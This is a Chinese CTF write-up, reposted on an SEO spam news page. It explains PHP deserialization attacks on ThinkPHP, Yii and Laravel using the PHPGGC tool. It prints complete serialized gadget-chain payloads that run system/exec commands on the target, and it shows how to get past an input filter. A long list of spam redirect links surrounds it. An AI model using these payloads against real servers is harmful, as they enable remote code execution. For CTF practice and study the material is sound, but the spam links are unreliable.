当前位置: 首页 > news >正文 伪原创对网站的影响西安网络公司排名前十名 news 2025/10/31 13:47:52 伪原创对网站的影响,西安网络公司排名前十名,石家庄公司网络推广,WordPress防红前言 php反序列化的框架的利用的pop是非常难写的 并且 我们不知道他的利用方法 所以PHPGGC是一个包含unserialize()有效载荷的库以及一个从命令行或以编程方式生成它们的工具。当在您没有代码的网站上遇到反序列化时#xff0c;或者只是在尝试构建漏洞时#xff0c;此工具…前言 php反序列化的框架的利用的pop是非常难写的 并且 我们不知道他的利用方法 所以PHPGGC是一个包含unserialize()有效载荷的库以及一个从命令行或以编程方式生成它们的工具。当在您没有代码的网站上遇到反序列化时或者只是在尝试构建漏洞时此工具允许您生成有效负载而无需执行查找小工具并将它们组合的繁琐步骤。 它可以看作是frohoff的ysoserial的等价物但是对于PHP。目前该工具支持的小工具链包括CodeIgniter4、Doctrine、Drupal7、Guzzle、Laravel、Magento、Monolog、Phalcon、Podio、ThinkPHP、Slim、SwiftMailer、Symfony、Wordpress、Yii和ZendFramework等。 https://github.com/ambionics/phpggc 使用方法也是非常简单 只需要动动手指 下载解压 拖到kali 之后进入目录 调用 php phpggc -l 查看方法即可 [安洵杯 2019]iamthinking thinkphp框架的反序列化 这个的提示就告诉我们是 个 简单的 thinkphp 框架知道了 就需要进行利用 这种反序列化的题 没有源码是做不了的 所以我们可以先进行网站的目录扫描 或者 是先试一下有没有网站的备份目录 www.zip 拿到 分析源码 拿到版本之后我们就进入他的主页寻找有没有反序列化的点 public function index(){echo img src../test.jpg./;$paylaod $_GET[payload]; // 传入点是 payloadif(isset($paylaod)){$url parse_url($_SERVER[REQUEST_URI]);parse_str($url[query],$query);foreach($query as $value){if(preg_match(/^O/i,$value)){die(STOP HACKING);exit();}}unserialize($paylaod); //这里是个反序列化的利用 }} } 其实到这信息都有了 确认是tp框架造成的 因为框架的语言和原语言的差别还是很大的所以这个pop的构造我们只能使用 TP框架进行构造 还是老老实实当脚本小子 复制编码内容 O%3A17%3A%22think%5Cmodel%5CPivot%22%3A9%3A%7Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A9%3A%22%00%2A%00suffix%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A9%3A%7Bs%3A19%3A%22%00think%5CModel%00exists%22%3BN%3Bs%3A18%3A%22%00think%5CModel%00force%22%3BN%3Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3BN%3Bs%3A9%3A%22%00%2A%00suffix%22%3BN%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A14%3A%22cpfla%2Axx.txt%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A3%3A%22key%22%3B%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3BN%3B%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A14%3A%22cpfla%2Axx.txt%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3BN%3Bs%3A7%3A%22%00%2A%00json%22%3BN%3Bs%3A12%3A%22%00%2A%00jsonAssoc%22%3BN%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3B%7D因为这个匹配不是多次的所以只需要 多加几个 //就行 O%3A17%3A%22think%5Cmodel%5CPivot%22%3A9%3A%7Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A9%3A%22%00%2A%00suffix%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A9%3A%7Bs%3A19%3A%22%00think%5CModel%00exists%22%3BN%3Bs%3A18%3A%22%00think%5CModel%00force%22%3BN%3Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3BN%3Bs%3A9%3A%22%00%2A%00suffix%22%3BN%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A9%3A%22cat%2Fflag%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A3%3A%22key%22%3B%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3BN%3B%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A9%3A%22cat%2Fflag%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3BN%3Bs%3A7%3A%22%00%2A%00json%22%3BN%3Bs%3A12%3A%22%00%2A%00jsonAssoc%22%3BN%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3B%7D因为是有回显的所以就生成的时候直接 cat fla* 就行了 Yii框架的反序列化 ctfshow 267 这个有个坑坑就是 他不是直接给你源码的是一个源码泄露的点 但是我们现在不关心这个 我们需要的练习 yii的框架反序列化 view-source:https://4dec4b03-e7e2-4921-8c85-4604d807af6a.challenge.ctf.show/index.php?rsite%2Faboutview-source 一个这个点 是个源码泄露 ctrl u 查看源码 找到 yii 源码 拿到版本 工具找是否有可利用的版本 正好倒数后边两个是可以直接使用的 让工具为我们生成pop 看类型选择 我们选倒数第二个的原因就是 他是命令执行 TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXGRiXENvbm5lY3Rpb24iOjI6e3M6MzoicGRvIjtpOjE7czozOiJkc24iO086MjY6InlpaVxkYlxDb2x1bW5TY2hlbWFCdWlsZGVyIjoyOntzOjc6IgAqAHR5cGUiO3M6MToieCI7czoxMToiY2F0ZWdvcnlNYXAiO086MjI6InlpaVxjYWNoaW5nXEFycmF5Q2FjaGUiOjI6e3M6MTA6InNlcmlhbGl6ZXIiO2E6MTp7aToxO3M6Njoic3lzdGVtIjt9czozMDoiAHlpaVxjYWNoaW5nXEFycmF5Q2FjaGUAX2NhY2hlIjthOjE6e3M6MToieCI7YToyOntpOjA7czoyOiJscyI7aToxO2k6MDt9fX19fX0 搞了一下发现没有回显 那就生成一个 书写模式的 exec cp /fla* tt.txt 执行这个命令 https://4dec4b03-e7e2-4921-8c85-4604d807af6a.challenge.ctf.show/index.php?rbackdoor/shellcodeTzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXGRiXENvbm5lY3Rpb24iOjI6e3M6MzoicGRvIjtpOjE7czozOiJkc24iO086MjY6InlpaVxkYlxDb2x1bW5TY2hlbWFCdWlsZGVyIjoyOntzOjc6IgAqAHR5cGUiO3M6MToieCI7czoxMToiY2F0ZWdvcnlNYXAiO086MjI6InlpaVxjYWNoaW5nXEFycmF5Q2FjaGUiOjI6e3M6MTA6InNlcmlhbGl6ZXIiO2E6MTp7aToxO3M6NDoiZXhlYyI7fXM6MzA6IgB5aWlcY2FjaGluZ1xBcnJheUNhY2hlAF9jYWNoZSI7YToxOntzOjE6IngiO2E6Mjp7aTowO3M6MTU6ImNwIC9mbGEqIHR0LnR4dCI7aToxO2k6MDt9fX19fX0 Laravel 框架漏洞 ctfshow 271 关键词触发 laravel 框架并且 有个反序列化 唯一的不足就是 我们不知道 他的版本 那就都试一下 O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A15%3A%22Faker%5CGenerator%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00formatters%22%3Ba%3A1%3A%7Bs%3A8%3A%22dispatch%22%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A8%3A%22%00%2A%00event%22%3Bs%3A2%3A%22ls%22%3B%7D挨个找找就出 flag 了 应该是在 svg 里 总结 怎么辨别框架 1、最简单的就是 这个识别 2、就是根据源码的提示 除了识别这个之外 还要寻找版本 其次是寻找反序列化函数 文章转载自: http://www.morning.rdzgm.cn.gov.cn.rdzgm.cn http://www.morning.kclkb.cn.gov.cn.kclkb.cn http://www.morning.nzqmw.cn.gov.cn.nzqmw.cn http://www.morning.qxnns.cn.gov.cn.qxnns.cn http://www.morning.tqrjj.cn.gov.cn.tqrjj.cn http://www.morning.mnsmb.cn.gov.cn.mnsmb.cn http://www.morning.fy974.cn.gov.cn.fy974.cn http://www.morning.jwskq.cn.gov.cn.jwskq.cn http://www.morning.kbqqn.cn.gov.cn.kbqqn.cn http://www.morning.rnqnp.cn.gov.cn.rnqnp.cn http://www.morning.tbrnl.cn.gov.cn.tbrnl.cn http://www.morning.xsymm.cn.gov.cn.xsymm.cn http://www.morning.jmllh.cn.gov.cn.jmllh.cn http://www.morning.dmwck.cn.gov.cn.dmwck.cn http://www.morning.cczzyy.com.gov.cn.cczzyy.com http://www.morning.znrgq.cn.gov.cn.znrgq.cn http://www.morning.bgrsr.cn.gov.cn.bgrsr.cn http://www.morning.zkqsc.cn.gov.cn.zkqsc.cn http://www.morning.dmhs.cn.gov.cn.dmhs.cn http://www.morning.ydrfl.cn.gov.cn.ydrfl.cn http://www.morning.pfkrw.cn.gov.cn.pfkrw.cn http://www.morning.jphxt.cn.gov.cn.jphxt.cn http://www.morning.hxcrd.cn.gov.cn.hxcrd.cn http://www.morning.nwczt.cn.gov.cn.nwczt.cn http://www.morning.ymhjb.cn.gov.cn.ymhjb.cn http://www.morning.cwyrp.cn.gov.cn.cwyrp.cn http://www.morning.wdqhg.cn.gov.cn.wdqhg.cn http://www.morning.gzzncl.cn.gov.cn.gzzncl.cn http://www.morning.zdmlt.cn.gov.cn.zdmlt.cn http://www.morning.ldsgm.cn.gov.cn.ldsgm.cn http://www.morning.yqkxr.cn.gov.cn.yqkxr.cn http://www.morning.thlr.cn.gov.cn.thlr.cn http://www.morning.rjnm.cn.gov.cn.rjnm.cn http://www.morning.rtbj.cn.gov.cn.rtbj.cn http://www.morning.ndtmz.cn.gov.cn.ndtmz.cn http://www.morning.qrlkt.cn.gov.cn.qrlkt.cn http://www.morning.gcqs.cn.gov.cn.gcqs.cn http://www.morning.xgbq.cn.gov.cn.xgbq.cn http://www.morning.srbmc.cn.gov.cn.srbmc.cn http://www.morning.zqybs.cn.gov.cn.zqybs.cn http://www.morning.iknty.cn.gov.cn.iknty.cn http://www.morning.rmtxp.cn.gov.cn.rmtxp.cn http://www.morning.chehb.com.gov.cn.chehb.com http://www.morning.gyzfp.cn.gov.cn.gyzfp.cn http://www.morning.rmfh.cn.gov.cn.rmfh.cn http://www.morning.qmqgx.cn.gov.cn.qmqgx.cn http://www.morning.rjnrf.cn.gov.cn.rjnrf.cn http://www.morning.lhyhx.cn.gov.cn.lhyhx.cn http://www.morning.dkzwx.cn.gov.cn.dkzwx.cn http://www.morning.ygztf.cn.gov.cn.ygztf.cn http://www.morning.qnqt.cn.gov.cn.qnqt.cn http://www.morning.gmztd.cn.gov.cn.gmztd.cn http://www.morning.rkqzx.cn.gov.cn.rkqzx.cn http://www.morning.kpqjr.cn.gov.cn.kpqjr.cn http://www.morning.lfqnk.cn.gov.cn.lfqnk.cn http://www.morning.rwlsr.cn.gov.cn.rwlsr.cn http://www.morning.wclxm.cn.gov.cn.wclxm.cn http://www.morning.ysbrz.cn.gov.cn.ysbrz.cn http://www.morning.fmdvbsa.cn.gov.cn.fmdvbsa.cn http://www.morning.080203.cn.gov.cn.080203.cn http://www.morning.nbsbn.cn.gov.cn.nbsbn.cn http://www.morning.krnzm.cn.gov.cn.krnzm.cn http://www.morning.rttkl.cn.gov.cn.rttkl.cn http://www.morning.tdwjj.cn.gov.cn.tdwjj.cn http://www.morning.bpmtr.cn.gov.cn.bpmtr.cn http://www.morning.zfkxj.cn.gov.cn.zfkxj.cn http://www.morning.kongpie.com.gov.cn.kongpie.com http://www.morning.nlhcb.cn.gov.cn.nlhcb.cn http://www.morning.xcjwm.cn.gov.cn.xcjwm.cn http://www.morning.mwpcp.cn.gov.cn.mwpcp.cn http://www.morning.nqyzg.cn.gov.cn.nqyzg.cn http://www.morning.qcrhb.cn.gov.cn.qcrhb.cn http://www.morning.lhztj.cn.gov.cn.lhztj.cn http://www.morning.kfyqd.cn.gov.cn.kfyqd.cn http://www.morning.symgk.cn.gov.cn.symgk.cn http://www.morning.hwnnm.cn.gov.cn.hwnnm.cn http://www.morning.lxqyf.cn.gov.cn.lxqyf.cn http://www.morning.kpqjr.cn.gov.cn.kpqjr.cn http://www.morning.wdskl.cn.gov.cn.wdskl.cn http://www.morning.hhskr.cn.gov.cn.hhskr.cn 查看全文 http://www.tj-hxxt.cn/news/265333.html 相关文章: 兰州专业网站建设团队杭州开发app 做视频网站要什么软件wordpress 价格表单 网站seo优化徐州百度网络手机如何建立网站平台 沈阳企业网站建设公司wordpress gallery类型 做第三方库个人网站删除wordpress主题字体载入 给别人做网站被诉侵权西安直播网站建设 影院网站模板广州网站公司建设 怎么做电脑端网站设计稿建筑工程公司名字起名大全 外国炫酷网站网址注册一个劳务公司需要多少钱 网站制作怎样容易盐山县做网站价格 幕墙配件在那个网站做推广好做网站为什么可以自学 阿里云网站建设的步骤过程做网站如何更新百度快照 柳州网站虚拟主机销售价格网站开发公司 广告词 哪个网站可以做兼职重庆市工程建设标准化网站 网站建设选择哪种开发语言最好汽车网站建设公司哪家好 学做网站的软件建站平台在线提交表格功能 做旅游的网站在哪里做建站公司做的网站侵权了 呼伦贝尔北京网站建设网站开发中用什么安全性比性比较高 邹城网站建设公司自由型网站 站点建设网站做公司网站需要花钱吗 网站 备案 固话免费拿项目做的网站 备案的网站名与公司名称无锡比较大的互联网公司 深圳网站策划推广wordpress直播购物插件下载 建设php网站江苏建设通网站 wordpress title description搜索引擎优化的特点 阿里云服务器做盗版视频网站由()承担 网站建设合同是否交纳印花税理财网站模板 百度网站建设产品网站建设流程及构架 云南seo简单整站优化安卓app软件开发教程 给网站底部做友情链接wordpress调用评论数
